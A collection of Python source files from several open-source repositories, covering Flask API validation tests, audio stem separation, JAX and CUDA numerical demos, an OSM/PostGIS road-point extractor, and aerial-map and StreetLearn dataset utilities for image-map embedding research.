return self.__mtgjson_to_card_kingdom
``` |
{
"source": "0b01001001/spectree",
"score": 2
} |
#### File: spectree/tests/test_plugin_flask_view.py
```python
import json
from random import randint
import pytest
from flask import Flask, jsonify, request
from flask.views import MethodView
from spectree import Response, SpecTree
from .common import JSON, Cookies, Headers, Query, Resp, StrDict, api_tag
def before_handler(req, resp, err, _):
if err:
resp.headers["X-Error"] = "Validation Error"
def after_handler(req, resp, err, _):
resp.headers["X-Validation"] = "Pass"
def api_after_handler(req, resp, err, _):
resp.headers["X-API"] = "OK"
api = SpecTree("flask", before=before_handler, after=after_handler, annotations=True)
app = Flask(__name__)
app.config["TESTING"] = True
class Ping(MethodView):
@api.validate(
headers=Headers, resp=Response(HTTP_200=StrDict), tags=["test", "health"]
)
def get(self):
"""summary
description"""
return jsonify(msg="pong")
class User(MethodView):
@api.validate(
query=Query,
json=JSON,
cookies=Cookies,
resp=Response(HTTP_200=Resp, HTTP_401=None),
tags=[api_tag, "test"],
after=api_after_handler,
)
def post(self, name):
score = [randint(0, request.context.json.limit) for _ in range(5)]
score.sort(reverse=request.context.query.order)
assert request.context.cookies.pub == "abcdefg"
assert request.cookies["pub"] == "abcdefg"
return jsonify(name=request.context.json.name, score=score)
class UserAnnotated(MethodView):
@api.validate(
resp=Response(HTTP_200=Resp, HTTP_401=None),
tags=[api_tag, "test"],
after=api_after_handler,
)
def post(self, name, query: Query, json: JSON, cookies: Cookies):
score = [randint(0, json.limit) for _ in range(5)]
score.sort(reverse=query.order)
assert cookies.pub == "abcdefg"
assert request.cookies["pub"] == "abcdefg"
return jsonify(name=json.name, score=score)
app.add_url_rule("/ping", view_func=Ping.as_view("ping"))
app.add_url_rule("/api/user/<name>", view_func=User.as_view("user"), methods=["POST"])
app.add_url_rule(
"/api/user_annotated/<name>",
view_func=UserAnnotated.as_view("user_annotated"),
methods=["POST"],
)
# INFO: ensures that spec is calculated and cached _after_ registering
# view functions for validations. This enables tests to access `api.spec`
# without app_context.
with app.app_context():
api.spec
api.register(app)
@pytest.fixture
def client():
with app.test_client() as client:
yield client
def test_flask_validate(client):
resp = client.get("/ping")
assert resp.status_code == 422
assert resp.headers.get("X-Error") == "Validation Error"
resp = client.get("/ping", headers={"lang": "en-US"})
assert resp.json == {"msg": "pong"}
assert resp.headers.get("X-Error") is None
assert resp.headers.get("X-Validation") == "Pass"
resp = client.post("api/user/flask")
assert resp.status_code == 422
assert resp.headers.get("X-Error") == "Validation Error"
client.set_cookie("flask", "pub", "abcdefg")
for fragment in ("user", "user_annotated"):
resp = client.post(
f"/api/{fragment}/flask?order=1",
data=json.dumps(dict(name="flask", limit=10)),
content_type="application/json",
)
assert resp.status_code == 200, resp.json
assert resp.headers.get("X-Validation") is None
assert resp.headers.get("X-API") == "OK"
assert resp.json["name"] == "flask"
assert resp.json["score"] == sorted(resp.json["score"], reverse=True)
resp = client.post(
f"/api/{fragment}/flask?order=0",
data=json.dumps(dict(name="flask", limit=10)),
content_type="application/json",
)
assert resp.json["score"] == sorted(resp.json["score"], reverse=False)
resp = client.post(
f"/api/{fragment}/flask?order=0",
data="name=flask&limit=10",
content_type="application/x-www-form-urlencoded",
)
assert resp.json["score"] == sorted(resp.json["score"], reverse=False)
def test_flask_doc(client):
resp = client.get("/apidoc/openapi.json")
assert resp.json == api.spec
resp = client.get("/apidoc/redoc")
assert resp.status_code == 200
resp = client.get("/apidoc/swagger")
assert resp.status_code == 200
``` |
{
"source": "0b01/autobasstab-web",
"score": 3
} |
#### File: autobasstab-web/api/separate.py
```python
import os
import ffmpeg
import numpy as np
# from spleeter import *
# from spleeter.audio.adapter import get_default_audio_adapter
# from spleeter.separator import Separator
# from spleeter.utils import *
from django.conf import settings
from .models import ProcessedTrack
class SpleeterSeparator:
"""Performs source separation using Spleeter API."""
def __init__(self, config=None):
"""Default constructor.
:param config: Separator config, defaults to None
"""
if config is None:
self.audio_bitrate = '256k'
self.audio_format = 'wav'
self.sample_rate = 44100
self.spleeter_stem = 'config/4stems-16kHz.json'
else:
self.audio_bitrate = config['audio_bitrate']
self.audio_format = config['audio_format']
self.sample_rate = config['sample_rate']
self.spleeter_stem = config['spleeter_stem']
# Use librosa backend as it is less memory intensive
self.separator = Separator(self.spleeter_stem, stft_backend='librosa', multiprocess=False)
self.audio_adapter = get_default_audio_adapter()
def separate(self, parts, input_path, dir_name, file_name):
"""Performs source separation by adding together the parts to be kept.
:param parts: List of parts to keep ('vocals', 'drums', 'bass', 'other')
:param input_path: Path to source file
:param output_path: Path to output file
:raises e: FFMPEG error
"""
waveform, _ = self.audio_adapter.load(input_path, sample_rate=self.sample_rate)
prediction = self.separator.separate(waveform)
out = np.zeros_like(prediction['vocals'])
part_count = 0
ret = {}
# Add up parts that were requested
for key in prediction:
dir = os.path.join(dir_name, key+".mp3")
self.audio_adapter.save(os.path.join(settings.MEDIA_ROOT, dir), prediction[key], self.separator._sample_rate, self.audio_format, self.audio_bitrate)
ret[key] = dir
if parts[key]:
out += prediction[key]
part_count += 1
out /= part_count
req_path = os.path.join(dir_name, file_name)
self.audio_adapter.save(os.path.join(settings.MEDIA_ROOT, req_path), out, self.separator._sample_rate, self.audio_format, self.audio_bitrate)
ret["req"] = req_path
return ret
def cached(self, parts, source_track, dir_name, file_name):
bass_path = ProcessedTrack.objects.filter(source_track=source_track, bass=True, vocals=False, other=False, drums=False).first().file.name
vocals_path = ProcessedTrack.objects.filter(source_track=source_track, bass=False, vocals=True, other=False, drums=False).first().file.name
other_path = ProcessedTrack.objects.filter(source_track=source_track, bass=False, vocals=False, other=True, drums=False).first().file.name
drums_path = ProcessedTrack.objects.filter(source_track=source_track, bass=False, vocals=False, other=False, drums=True).first().file.name
ret = {
"bass": bass_path,
"vocals": vocals_path,
"other": other_path,
"drums": drums_path,
}
load_paths = {k:ret[k] for k in parts if parts[k]}
arrs = [self.audio_adapter.load(os.path.join(settings.MEDIA_ROOT, p))[0] \
for p in load_paths.values()]
out = sum(arrs) / len(arrs)
req_path = os.path.join(dir_name, file_name)
self.audio_adapter.save(os.path.join(settings.MEDIA_ROOT, req_path), out, self.separator._sample_rate, self.audio_format, self.audio_bitrate)
ret["req"] = req_path
return ret
``` |
{
"source": "0b01/jax",
"score": 3
} |
#### File: jax/examples/physical_optimization.py
```python
import numpy as onp
import matplotlib.pyplot as plt
import jax.numpy as np
from tqdm import tqdm
from jax import grad, jit, vmap, device_put
from random import uniform
N = 25
H_step = 0.1
H_0 = 10
g = -9.8
hoop_x, hoop_y = (10, 8)
board = device_put(onp.random.rand(N))
# print(board)
@jit
def build_surface(board):
ret = []
for i, (a,b) in enumerate(zip(board, board[1:])):
y_0 = -i*H_step+H_0
x_0 = a + 10
y_1 = -(i+1)*H_step+H_0
x_1 = b + 10
slope = (y_1 - y_0) / (x_1 - x_0)
intercept = y_1 - x_1 * slope
ret.append([slope, intercept])
return ret
@jit
def solve_t(k, l, x_0, y_0, v_x0, v_y0):
c = y_0 - k * x_0 - l
b = v_y0 - k * v_x0
a = 0.5 * g
d = (b**2) - (4*a*c)
sol1 = (-b - np.sqrt(d))/(2*a)
sol2 = (-b + np.sqrt(d))/(2*a)
# print(sol1, sol2)
y_1 = y_0 + v_y0*sol1 + 0.5*g*sol1 ** 2
y_2 = y_0 + v_y0*sol2 + 0.5*g*sol2 ** 2
return sol1, sol2, y_1, y_2
@jit
def dist_from_hoop(t, y_f, x_0, v_x0, v_y0):
x_f = x_0 + v_x0 * t
v_xf = v_x0
v_yf = v_y0 + g * t
cor = 0.81 # https://en.wikipedia.org/wiki/Coefficient_of_restitution
v_xb = -cor * v_xf
v_yb = -cor * v_yf
t = 0.1
x_b = x_f + v_xb * t
y_b = y_f + v_yb * t + 0.5*g*t**2
# print("final_pos", x_b, y_b)
dist = np.sqrt((x_b - hoop_x)**2 + (y_b - hoop_y)**2)
return dist
def bounce(board, x_0, y_0, v_x0, v_y0):
lines = build_surface(board)
# y_0 + v_y0*t + 0.5*g*t^2 = k(x_0 + v_x0*t) + l
# (y_0 - k * x_0 - l) + (v_y0 - k * v_x0)*t + 0.5*g*t^2 = 0
for i, (k, l) in enumerate(lines):
sol1, sol2, y_1, y_2 = solve_t(k, l, x_0, y_0, v_x0, v_y0)
t = 0
y_f = 0
if sol1 > 0 and -(i+1)*H_step+H_0 < y_1 < -i*H_step+H_0:
t = sol1
y_f = y_1
elif sol2 > 0 and -(i+1)*H_step+H_0 < y_2 < -i*H_step+H_0:
t = sol2
y_f = y_2
else:
continue
loss = dist_from_hoop(t, y_f, x_0, v_x0, v_y0)
return loss
return 0.
# print(bounce(board, 3.1, 4, 10, 10))
def plot():
plt.figure(figsize=(12,6))
# xs = np.arange(8, 12, 0.1);
# for m, k in build_surface(board):
# ys = xs * m + k
# plt.plot(xs, ys)
for i, x in enumerate(board):
y = -i*H_step+H_0
print(x+10, y)
plt.scatter(x+10, y)
plt.xlim(0, 12)
plt.ylim(0, 12)
plt.scatter(hoop_x, hoop_y, s=300)
plt.xlabel('x')
plt.ylabel('y')
# plt.show()
plot()
plt.savefig("orig.png")
for i in tqdm(range(3000)):
x0 = 0
y0 = 5
vx = uniform(7, 10)
vy = uniform(7, 10)
board_grad = grad(bounce, 0)(board, x0, y0, vx, vy)
# print(board_grad)
board += -board_grad * 0.1
plot()
plt.savefig("optimized.png")
``` |
{
"source": "0b10010010/CUDAKalmanFilter",
"score": 3
} |
#### File: CUDAKalmanFilter/test/gpu_example.py
```python
import numpy as np
from timeit import default_timer as timer
from numba import vectorize
@vectorize(["float32(float32, float32)"], target='cuda')
def VectorAdd_GPU(a, b):
return a + b
def VectorAdd_CPU(a, b, c):
for i in range(a.size):
c[i] = a[i] + b[i]
def main():
N = 3200000
A = np.ones(N, dtype=np.float32)
B = np.ones(N, dtype=np.float32)
C = np.zeros(N, dtype=np.float32)
start = timer()
VectorAdd_CPU(A, B, C)
vectoradd_cpu_time = timer() - start
start = timer()
C = VectorAdd_GPU(A, B)
vectoradd_gpu_time = timer() - start
print("VectorAdd_CPU took %f seconds" % vectoradd_cpu_time)
print("VectorAdd_GPU took %f seconds" % vectoradd_gpu_time)
if __name__ == '__main__':
main()
``` |
{
"source": "0b10/qsm",
"score": 2
} |
#### File: qsm/tests/test_remote.py
```python
from qsm.remote import update, install, remove
import re
# >>> UPDATE >>>
def test_update_returns_a_string():
assert isinstance(update(), str), "did not return a string"
def test_update_returns_an_expected_value():
assert re.search("dnf update -y", update()
), "did not return an update script"
# >>> INSTALL >>>
def test_install_returns_a_string():
assert isinstance(install("vim nano"), str), "did not return a string"
def test_install_returns_an_expected_value():
assert re.search("dnf install -y vim", install("vim")
), "did not return an install script"
# >>> REMOVE >>>
def test_remove_returns_a_string():
assert isinstance(remove("vim nano"), str), "did not return a string"
def test_remove_returns_an_expected_value():
assert re.search("dnf remove -y vim nano", remove("vim nano")
), "did not return an install script"
``` |
{
"source": "0b3d/dkmkpy",
"score": 3
} |
#### File: renderer/pyfiles/extract_road_points_gis.py
```python
import psycopg2, pickle
#Define function to query info, return a tuple
def query_attributes(locations):
size = 0.0005
line_list = []
point_list = []
polygon_list = []
for location in locations:
lat, lon = location[0], location[1]
# , leisure, tourism, railway, water, tags
query1 = """ SELECT name, highway
FROM planet_osm_line
WHERE planet_osm_line.way &&
ST_Transform(
ST_MakeEnvelope({}, {}, {}, {},
4326),3857
) and name <> '<NAME>' and highway <> '';
"""
query1 = query1.format(lon-size,lat-size,lon+size,lat+size)
cur.execute(query1)
res = cur.fetchall()
line_list.append(res)
# Query data from points
query2 = """ SELECT amenity, building, religion, shop, tourism, tags
FROM planet_osm_point
WHERE planet_osm_point.way &&
ST_Transform(
ST_MakeEnvelope({}, {}, {}, {},
4326),3857
);
"""
query2 = query2.format(lon-size,lat-size,lon+size,lat+size)
cur.execute(query2)
res = cur.fetchall()
point_list.append(res)
# Query data from polygons
query3 = """ SELECT amenity, landuse, shop, building, sport, tags
FROM planet_osm_polygon
WHERE planet_osm_polygon.way &&
ST_Transform(
ST_MakeEnvelope({}, {}, {}, {},
4326),3857
);
"""
query3 = query3.format(lon-size,lat-size,lon+size,lat+size)
cur.execute(query3)
res = cur.fetchall()
polygon_list.append(res)
return line_list, point_list, polygon_list
# Query the main information
conn = psycopg2.connect("dbname='gis' user='postgres' host='f978bc0bd1f8'")
cur = conn.cursor()
query = """
SELECT ST_Y((dp).geom), ST_X((dp).geom), name, highway, junction, sidewalk, lit, lanes, noexit
FROM(
SELECT ST_DumpPoints(ST_Transform(way,4326)) AS dp, name, highway, junction, tags->'sidewalk' as sidewalk, tags->'lit' as lit, tags->'lanes' as lanes, tags->'noexit' as noexit
FROM planet_osm_line
WHERE name = '<NAME>' and highway <> ''
ORDER BY name
) As foo;
"""
cur.execute(query)
locations = cur.fetchall()
line, point, polygon = query_attributes(locations)
for location in locations:
print(location[0:2])
for entry in line:
print(entry)
# #Now query noexit points
# #query = """ SELECT ST_X(ST_Transform(way,4326)), ST_Y(ST_Transform(way,4326)) -- tags
# #FROM planet_osm_point
# #WHERE tags @> 'noexit=>yes'::hstore;
# #"""
# #cur.execute(query)
# #noexit = cur.fetchall()
# #for entry in noexit:
# # print(entry)
# query_limits = """
# select min(st_xmin(st_transform(way,4326))), min(st_ymin(st_transform(way,4326))), max(st_xmax(st_transform(way,4326))), max(st_ymax(st_transform(way,4326))) from planet_osm_line where name<>'' and highway<>'';
# """
# cur.execute(query_limits)
# extreme = cur.fetchall()
# print("Minimun , Maximum :")
# print(extreme)
# #-------Save in a Pickel File -----------------------------
# #file_path = "/map_data/locations_data.pkl"
# #with open( file_path, 'wb') as f:
# # pickle.dump(locations, f)
``` |
{
"source": "0b3d/Image-Map-Embeddings",
"score": 3
} |
#### File: Image-Map-Embeddings/aerial/area.py
```python
import os
import cv2
import numpy as np
from aerial.tile import Tile, deg2num, num2deg
from utils.util import haversine
def get_area_extents():
areas = {
'London_test' : [51.4601825, -0.1282832, 51.5477509, -0.0544434],
'SP50NW': [51.7414809, -1.2772553, 51.7859644, -1.2040581],
'ST57SE2014' : [51.4272088, -2.6486388, 51.4725403, -2.5772934 ],
'ST57SE2016' : [51.4272088, -2.6486388, 51.4725403, -2.5772934 ],
'ST57SE2017' : [51.4272088, -2.6486388, 51.4725403, -2.5772934 ]
}
return areas
def get_aerial_directory(areaname):
directories = {
'London_test' : 'aerial_tiles',
'SP50NW': 'aerial_tiles',
'ST57SE2014' : 'ST57SE_aerial_tiles_2014',
'ST57SE2016' : 'ST57SE_aerial_tiles_2016',
'ST57SE2017' : 'aerial_tiles'
}
return directories[areaname]
def get_readable_name(areaname):
areas = {
'London_test' : 'London',
'SP50NW': 'Oxford',
'ST57SE2014' : 'Bristol 2014',
'ST57SE2016' : 'Bristol 2016',
'ST57SE2017' : 'Bristol 2017'
}
return areas[areaname]
class Area():
def __init__(self, name, dataroot, results_dir, extent=None, zoom=18):
self.name = name
self.dataroot = dataroot
self.results_dir = results_dir
self.zoom = zoom
self.dir = get_aerial_directory(name)
self.readable_name = get_readable_name(name)
total_extent_of_the_area = get_area_extents()[name]
self.totalbbox = total_extent_of_the_area
if extent is None:
# Remove 5% in edges
strip_lat = 0.05*(total_extent_of_the_area[2] - total_extent_of_the_area[0])
strip_lon = 0.05*(total_extent_of_the_area[3] - total_extent_of_the_area[1])
extent_without_edges = [total_extent_of_the_area[0]+strip_lat,
total_extent_of_the_area[1]+strip_lon,
total_extent_of_the_area[2]-strip_lat,
total_extent_of_the_area[3]-strip_lon]
else:
extent_without_edges = extent
self.workingbbox = extent_without_edges
self.world_size_x = haversine(extent_without_edges[0],
extent_without_edges[1],
extent_without_edges[0],
extent_without_edges[3])
self.world_size_y = haversine(extent_without_edges[0],
extent_without_edges[1],
extent_without_edges[2],
extent_without_edges[1])
self.arcllat = self.workingbbox[2]-self.workingbbox[0]
self.arcllon = self.workingbbox[3]-self.workingbbox[1]
# Define an inner boundary where the robot should start to turn
strip_lat = 0.10*(extent_without_edges[2] - extent_without_edges[0])
strip_lon = 0.10*(extent_without_edges[3] - extent_without_edges[1])
innerbbox = [extent_without_edges[0]+strip_lat,
extent_without_edges[1]+strip_lon,
extent_without_edges[2]-strip_lat,
extent_without_edges[3]-strip_lon]
self.innerbbox = innerbbox
def get_routes(self, seed=440):
path = os.path.join('aerial','routes', self.name + '_' + str(seed) + '.npz')
routes = np.load(path)['routes']
return routes
def get_commands(self, seed=440):
path = os.path.join('aerial', 'routes', self.name + '_' + str(seed) + '.npz')
routes = np.load(path)['commands']
return routes
def get_working_bbox_in_tile_coordinates(self):
extent =self.workingbbox
xmin, ymin = deg2num(extent[2],extent[1],self.zoom)
xmax, ymax = deg2num(extent[0],extent[3],self.zoom)
return [ymin, xmin, ymax, xmax]
def get_total_bbox_in_tile_coordinates(self):
extent =self.totalbbox
xmin, ymin = deg2num(extent[2],extent[1],self.zoom)
xmax, ymax = deg2num(extent[0],extent[3],self.zoom)
return [ymin, xmin, ymax, xmax]
def get_area_size_in_tiles(self):
ymin, xmin, ymax, xmax = self.get_working_bbox_in_tile_coordinates()
W = xmax - xmin + 1
H = ymax - ymin + 1
return (H,W)
def get_arclength(self):
arcllat = self.workingbbox[2]-self.workingbbox[0]
arcllon = self.workingbbox[3]-self.workingbbox[1]
return (arcllat,arcllon)
def get_tile_coords(self):
coords = []
tile_zooms = [self.zoom]
for z in tile_zooms:
x = np.arange(self.xmin,self.xmax+1,1)
y = np.arange(self.ymin,self.ymax+1,1)
x = np.tile(x,self.H)
y = np.repeat(y,self.W)
z = np.tile(z,self.H*self.W)
grid = np.stack([x,y,z],1)
coords.append(grid)
coords = np.concatenate(coords, 0)
return coords
def get_map_grid_for_mpl(self):
ymin, xmin, ymax, xmax = self.get_working_bbox_in_tile_coordinates()
max_lat, min_lon = num2deg(xmin, ymin, self.zoom)
min_lat, max_lon = num2deg(xmax+1,ymax+1, self.zoom)
grid = [min_lon,max_lon,min_lat,max_lat]
return grid
def get_map(self, style='ordnance',filepath=None):
if filepath is None:
filename = os.path.join('aerial','maps',self.name + '_' + style + '.png')
else:
filename = filepath
area_map = cv2.imread(filename)
if area_map is None:
raise FileExistsError(filename)
return area_map
def create_area_map(self, H, W, save=False, name=None):
area_map = []
ymin, xmin, ymax, xmax = self.get_working_bbox_in_tile_coordinates()
for i in range( ymin, ymax+1):
row = []
for j in range(xmin, xmax+1):
coords = (int(j),int(i), self.zoom)
mapa = Tile(coords, self.dataroot).get_tile(domain='map')
#mapa = cv2.resize(mapa,(64,64))
row.append(mapa)
row = np.concatenate(row,1)
area_map.append(row)
area_map = np.concatenate(area_map, axis=0)
area_map = cv2.resize(area_map,(W,H))
if save:
map_name = self.name + '_ordnance.png' if name is None else name
cv2.imwrite(os.path.join('aerial','maps', map_name), area_map)
return area_map
def m2deg(self, disp_in_meters):
arclengthlat = disp_in_meters[0] * self.arcllat / (1000*self.world_size_y)
arclengthlon = disp_in_meters[1] * self.arcllon / (1000*self.world_size_x)
return (arclengthlat, arclengthlon)
def get_map_descriptors(self, model, epoch='latest'):
dataFilename = os.path.join( self.results_dir, model, epoch + '_' + self.name + '_z_' + str(self.zoom) + '.npz')
descriptors = np.load(dataFilename)['X']
area_coords = np.load(dataFilename)['coords']
# Take descriptors of the subarea only
ymin, xmin, ymax, xmax = self.get_working_bbox_in_tile_coordinates()
indices_x = np.arange( xmin , xmax + 1 ) - area_coords[0,:,0,3].min()
indices_y = np.arange( ymin , ymax + 1 ) - area_coords[:,0,0,2].min()
indices_x = np.expand_dims(indices_x,0).astype(int)
indices_y = np.expand_dims(indices_y,1).astype(int)
descriptors = descriptors[indices_y,indices_x]
working_coords = area_coords[indices_y,indices_x]
return (descriptors, working_coords)
    def show(self):
        # get_map() takes a style/filepath rather than a size, so fetch the saved map and resize it for display
        area_map = cv2.resize(self.get_map(), (1280, 720))
        cv2.imshow(self.name, area_map)
        cv2.waitKey(0)
if __name__ == "__main__" :
dataroot = os.path.join(os.environ['DATASETS'],'digimap_data')
area = Area('ST57SE', dataroot)
mymap = area.create_area_map(512,512)
cv2.imshow('mymap', mymap)
cv2.waitKey(0)
cv2.destroyWindow('mymap')
```
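The `Area` class above relies on `deg2num`, `num2deg` and `haversine` helpers imported from elsewhere in the repository (the `aerial.tile` module imported by the next file provides the tile conversions). For reference, a minimal sketch of the standard slippy-map and great-circle formulas it appears to assume; the argument order and the kilometre return unit are inferred from the calls in `__init__` and `m2deg`, so treat this as illustrative rather than the repository's actual implementation:
```python
import math

def deg2num(lat_deg, lon_deg, zoom):
    # Standard slippy-map conversion: (lat, lon) -> integer tile indices (x, y) at a zoom level.
    lat_rad = math.radians(lat_deg)
    n = 2.0 ** zoom
    xtile = int((lon_deg + 180.0) / 360.0 * n)
    ytile = int((1.0 - math.asinh(math.tan(lat_rad)) / math.pi) / 2.0 * n)
    return xtile, ytile

def num2deg(xtile, ytile, zoom):
    # Inverse conversion: tile indices -> (lat, lon) of the tile's north-west corner.
    n = 2.0 ** zoom
    lon_deg = xtile / n * 360.0 - 180.0
    lat_rad = math.atan(math.sinh(math.pi * (1 - 2 * ytile / n)))
    return math.degrees(lat_rad), lon_deg

def haversine(lat1, lon1, lat2, lon2, radius_km=6371.0):
    # Great-circle distance in kilometres (m2deg above multiplies by 1000 to get metres).
    phi1, phi2 = math.radians(lat1), math.radians(lat2)
    dphi = math.radians(lat2 - lat1)
    dlam = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(phi1) * math.cos(phi2) * math.sin(dlam / 2) ** 2
    return 2 * radius_km * math.asin(math.sqrt(a))
```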
#### File: Image-Map-Embeddings/aerial/grid_utils.py
```python
import numpy as np
from aerial.tile import deg2num, num2deg
from math import sqrt
def deg2num_rect(extent, zoom=18):
x_min, y_min = deg2num(extent[2],extent[1], zoom)
x_max, y_max = deg2num(extent[0],extent[3], zoom)
return [x_min, y_min,x_max, y_max]
def get_XY_size(extent, zoom=18):
XYextent = deg2num_rect(extent, zoom)
H = XYextent[3] - XYextent[1]
W = XYextent[2] - XYextent[0]
return H,W
def get_uniform_coords_in_extent(extent, scale_factor=2, zoom=18):
H, W = get_XY_size(extent, zoom)
new_H = H * scale_factor
new_W = W * scale_factor
lat = np.linspace(extent[2], extent[0], new_H)
lon = np.linspace(extent[1], extent[3], new_W)
lon = np.tile(lon,new_H)
lat = np.repeat(lat,new_W)
z = np.tile(zoom,new_H*new_W)
coords = np.stack([lat,lon,z],1)
return coords
def get_extent(coords):
test = coords[0][0].item()
isXY = test.is_integer()
if isXY:
min_x, min_y = coords[:,:2].min(0)
max_x, max_y = coords[:,:2].max(0)
z = coords[0,2].item()
max_lat, min_lon = num2deg(min_x, min_y, z)
min_lat, max_lon = num2deg(max_x+1, max_y+1, z)
extent = [min_lat, min_lon, max_lat, max_lon]
else:
min_lat, min_lon = coords[:,:2].min(0)
max_lat, max_lon = coords[:,:2].max(0)
extent = [min_lat, min_lon, max_lat, max_lon]
return extent, isXY
def get_grid(descriptors, original_extent, working_extent, scale_factor, zoom=18):
area_extent_xy = deg2num_rect(original_extent, zoom)
working_extent_xy = deg2num_rect(working_extent,zoom)
H,W = get_XY_size(original_extent, zoom)
new_H, new_W = H*scale_factor, W*scale_factor
min_x = (working_extent_xy[0] - area_extent_xy[0])*scale_factor
min_y = (working_extent_xy[1] - area_extent_xy[1])*scale_factor
max_x = (working_extent_xy[2] - area_extent_xy[0])*scale_factor
max_y = (working_extent_xy[3] - area_extent_xy[1])*scale_factor
descriptors = np.reshape(descriptors,(int(new_H),int(new_W),-1))
descriptors = descriptors[min_y:max_y+1,min_x:max_x+1]
return descriptors
def get_scale_factor(original_num_elements, current_num_elements):
return int(sqrt(current_num_elements / original_num_elements))
```
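A rough usage sketch for the helpers above; the extent values (ordered `[min_lat, min_lon, max_lat, max_lon]`, matching `get_extent`) are invented for illustration, and the example assumes the repository's `aerial` package is importable:
```python
from aerial.grid_utils import get_uniform_coords_in_extent, get_extent, get_scale_factor

extent = [51.45, -2.62, 51.47, -2.58]        # [min_lat, min_lon, max_lat, max_lon], made-up values
coords = get_uniform_coords_in_extent(extent, scale_factor=2, zoom=18)
print(coords.shape)                          # (new_H * new_W, 3) rows of (lat, lon, zoom)

recovered, is_xy = get_extent(coords)        # lat/lon coordinates, so is_xy is False
print(recovered, is_xy)                      # approximately the original extent

# Four times as many points as the original grid -> scale factor of 2
print(get_scale_factor(coords.shape[0] // 4, coords.shape[0]))
```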
#### File: Image-Map-Embeddings/aerial/motion_estimate.py
```python
import cv2
import numpy as np
import math
class Homography():
def __init__(self, first_frame, verbose=False):
"""
Implements a class that estimates the Homography using point correspondances.
"""
self.old = first_frame
self.old_gray = cv2.cvtColor(first_frame, cv2.COLOR_BGR2GRAY)
self.orb = cv2.ORB_create()
self.old_kp, self.old_des = self.orb.detectAndCompute(self.old_gray, None)
self.old_frame = first_frame
self.old_yaw = 0.0
self.old_t = np.array([0.0,0.0])
self.verbose = verbose
def estimate(self, frame):
""" This method estimates translation and yaw from the homography
"""
new_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
new_kp, new_des = self.orb.detectAndCompute(new_gray, None)
if new_des is not None and self.old_des is not None:
matcher = cv2.DescriptorMatcher_create(cv2.DESCRIPTOR_MATCHER_BRUTEFORCE_HAMMING)
matches = matcher.match(self.old_des, new_des)
matches = sorted(matches, key= lambda x:x.distance)
npoints = len(matches)
if npoints > 100:
points1 = np.zeros((len(matches),2), dtype=np.float32)
points2 = np.zeros((len(matches),2), dtype=np.float32)
for i,match in enumerate(matches):
points1[i, :] = self.old_kp[match.queryIdx].pt
points2[i, :] = new_kp[match.trainIdx].pt
h, mask = cv2.findHomography(points1, points2, cv2.RANSAC)
nransac = (mask==1).sum()
if nransac > 50:
matchesMask = mask.ravel().tolist()
img = cv2.drawMatches(self.old_frame, self.old_kp, frame, new_kp, matches, None, matchesMask=matchesMask)
hn = h / h[2,2]
t = hn[:2,2]
sy = math.sqrt(hn[0,0]*hn[0,0] + hn[1,0]*hn[1,0])
singular = sy < 1e-6
if not singular:
yaw = math.atan2(hn[1,0],hn[0,0])
else:
yaw = 0
self.old_yaw = yaw
self.old_t = t
else:
if self.verbose:
print("Warning! not enough points in ransac")
yaw = self.old_yaw
t = self.old_t
img = frame
else:
if self.verbose:
print("Warning! not enough matched points")
yaw = self.old_yaw
t = self.old_t
img = frame
else:
yaw = self.old_yaw
t = self.old_t
img = frame
self.old_frame = frame
self.old_kp = new_kp
self.old_des = new_des
return yaw, t, img
```
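A hedged sketch of how the estimator above might be driven frame by frame; the video filename is a placeholder and the display loop is only for illustration:
```python
import cv2
from aerial.motion_estimate import Homography

cap = cv2.VideoCapture("flight.mp4")            # placeholder video path
ok, first = cap.read()
if ok:
    tracker = Homography(first, verbose=True)
    while True:
        ok, frame = cap.read()
        if not ok:
            break
        yaw, t, vis = tracker.estimate(frame)   # yaw in radians, t in pixels
        print("yaw: {:.3f} rad, translation: {}".format(yaw, t))
        cv2.imshow("matches", vis)
        if cv2.waitKey(1) & 0xFF == ord("q"):
            break
cap.release()
cv2.destroyAllWindows()
```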
#### File: Image-Map-Embeddings/data/streetlearn_dataset.py
```python
import cv2
import random
import numpy as np
import torch
from PIL import Image
import torchvision.transforms as transforms
from slutils.area import Area
from slutils.utils import rotate_panorama
from data.base_dataset import BaseDataset
from data.transforms import AddGaussianNoise, RandomErasing
from utils.util import tensor2im
def random_crop(tile, size_t=224, size_final=128):
""" Crop and add noise to the tile"""
w, h = tile.shape[0:2]
delta = h - size_t
ht = np.random.randint(0, delta)
wt = ht
temp_tile = tile[ht:h-ht, wt:w-wt]
tile = cv2.resize(temp_tile, (size_final,size_final))
return tile
def get_transforms(preprocess):
transform_list = []
transform_list += [transforms.ToTensor()]
if 'normalize' in preprocess:
transform_list += [transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]
if 'erasing' in preprocess:
transform_list += [RandomErasing(p=0.75, scale=(0.01, 0.10), ratio=(0.2, 0.8), value='random', inplace=True)]
if 'noise' in preprocess:
transform_list += [AddGaussianNoise(mean=0.0, std=0.01)]
return transforms.Compose(transform_list)
class StreetLearnDataset(BaseDataset):
"""A customized dataset Class for StreetLearn data """
@staticmethod
def modify_commandline_options(parser, is_train):
parser.set_defaults(dataroot='streetlearn', tile_size=128, area='train', domain=['X','Y'])
parser.add_argument('--pano_size', type=int, default=128, help='Panorama size')
parser.add_argument('--panorama_mode', type=str, default='list', help='Input mode for the panorama pano|grid|list')
        parser.add_argument('--no_local_rotation', action='store_true', help='Disable rotations and flipping at location level')
        parser.add_argument('--no_map_random_crop', action='store_true', help='Disable random cropping for the map tile')
        parser.add_argument('--no_aligned', action='store_true', help='Disable tile and panorama alignment')
        parser.add_argument('--flips', action='store_true', help='If specified use flipping for data augmentation')
parser.add_argument('--no_rotations', action='store_true', help='Disable rotations for data augmentation')
if is_train:
parser.set_defaults(preprocess='erasing,normalize')
else:
parser.set_defaults(preprocess='normalize', batch_size=100, flips=False, num_augmentations=1, serial_batches=True)
return parser
def __init__(self, opt):
"""Initialize this dataset class.
Parameters:
opt (Option class) -- stores all the experiment flags; needs to be a subclass of BaseOptions
"""
BaseDataset.__init__(self, opt)
self.area = Area(opt.area, opt.dataroot)
self.dataroot = opt.dataroot
def __getitem__(self, index):
""" Gets a sample location including augmentations.
Parameters:
index -- Index of the location.
Returns a dictionary that contains
X (tensor) - - Map tiles' tensor with shape [batch_size, num_augmentations, num_channels, width, heigth]
Y (tensor) - - Panoramas tensor with shape [batch_size, direction*, num_augmentations, num_channels, width, heigth]
* Only exists when panorama_mode is 'list'
labels (tensor) -- A tensor with the location labels
index (int) - - index of location
paths (str) - - Path to panorama (used for some visualizations)
"""
